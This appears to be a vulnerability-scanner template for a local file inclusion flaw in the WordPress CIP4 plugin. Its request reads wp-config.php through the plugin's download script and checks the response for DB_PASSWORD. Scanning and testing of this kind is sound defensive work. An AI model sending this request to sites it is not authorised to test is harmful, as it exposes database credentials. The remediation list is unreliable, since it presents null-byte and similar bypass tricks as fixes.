id: Wordpress-CIP4-LFI
info:
  name: wordpress_CIP4_lfi
  author:
  - l0ne1y
  description: |-
    WordPress Plugin CIP4 local file inclusion vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    There is a file inclusion vulnerability in Wordpress Plugin CIP4, which allows remote attackers to conduct file inclusion attacks through the target parameter and info parameter.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/CIP4

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: dsl
    dsl:
    - 'contains(body,"DB_PASSWORD") && status_code==200 '
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php'
  method: GET
